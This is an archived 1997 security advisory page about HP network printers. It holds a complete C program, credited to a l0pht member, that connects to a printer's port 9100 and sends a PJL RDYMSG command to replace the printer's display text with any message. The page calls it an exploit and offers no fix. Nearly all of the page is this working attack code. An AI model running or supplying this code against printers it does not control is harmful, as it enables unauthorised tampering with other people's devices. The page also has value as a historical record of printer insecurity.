TUCoPS :: Network Appliances :: displayh.htm

HP printers display hack 
Vulnerability

    Display Hack using PJL

Affected

    Systems with HP printers

Description

    Silicosis found following. There is a neat hack that lets you  use
    HP's PJL commands to remotely  change the display on networked  HP
    printers.  Exploit follows:

    /*
       HP Printer Hack
       12/8/97 sili@l0pht.com
    */

    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <stdio.h>

    #define PORT 9100

    int main (int argc, char *argv[]) {

      int sockfd,len,bytes_sent;   /* Sock FD */
      struct hostent *host;   /* info from gethostbyname */
      struct sockaddr_in dest_addr;   /* Host Address */
      char line[100];

      if (argc !=3) {
        printf("HP Display Hack\n--sili@l0pht.com 12/8/97\n\n%s printer \"message\"\n",argv[0]);
        printf("\tMessage can be up to 16 characters long\n");
        exit(1);
      }

      if ( (host=gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname");
        exit(1);
      }

      printf ("HP Display hack -- sili@l0pht.com\n");
      printf ("Hostname:   %s\n", argv[1]);
      printf ("Message: %s\n",argv[2]);

      /* Prepare dest_addr */
      dest_addr.sin_family= host->h_addrtype;  /* AF_INET from gethostbyname */
      dest_addr.sin_port= htons(PORT) ; /* PORT defined above */

      /* Prepare dest_addr */
      bcopy(host->h_addr, (char *) &dest_addr.sin_addr, host->h_length);

      bzero(&(dest_addr.sin_zero), 8);  /* Take care of  sin_zero  ??? */


      /* Get socket */
    /*  printf ("Grabbing socket....\n"); */
      if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
        perror("socket");
        exit(1);
      }

      /* Connect !*/

      printf ("Connecting....\n");

      if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
        perror("connect");
        exit(1);}

      /* Preparing JPL Command */

      strcpy(line,"\033%-12345X@PJL RDYMSG DISPLAY = \"");
      strncat(line,argv[2],16);
      strcat(line,"\"\r\n\033%-12345X\r\n");

      /* Sending data! */

    /*  printf ("Sending Data...%d\n",strlen(line));*/
    /*  printf ("Line: %s\n",line); */
      bytes_sent=send(sockfd,line,strlen(line),0);

      printf("Sent %d bytes\n",bytes_sent);
      close(sockfd);
    }

Solution

    ???

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH